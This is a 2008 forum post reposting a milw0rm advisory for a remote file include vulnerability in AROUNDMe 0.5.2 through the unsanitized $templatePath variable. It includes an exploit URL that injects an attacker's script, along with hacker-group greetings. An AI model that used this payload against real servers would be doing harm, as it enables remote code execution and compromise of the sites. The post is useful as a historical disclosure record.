Guest Nemessis Posted April 26, 2008 Report Share Posted April 26, 2008 http://www.milw0rm.com/exploits/2562---------------------------------------------------------------------------AROUNDMe <= 0.5.2 [templatePath] Remote File Include Vulnerability---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : AROUNDMeversion : 0.5.2Download: http://savannah.gnu.org/download/aroundme/aroundme_0_5_2.tar.tgz------------------------------------------------------------------Exploit:~~~~~~~~Variable $templatePath not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://www.site.com/[path]/template/barnraiser_01/p_new_password.tpl.php?templatePath=[Evil_Script]---------------------------------------------------------------------------Shoutz:~~~~~~~# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ] Quote Link to comment Share on other sites More sharing options...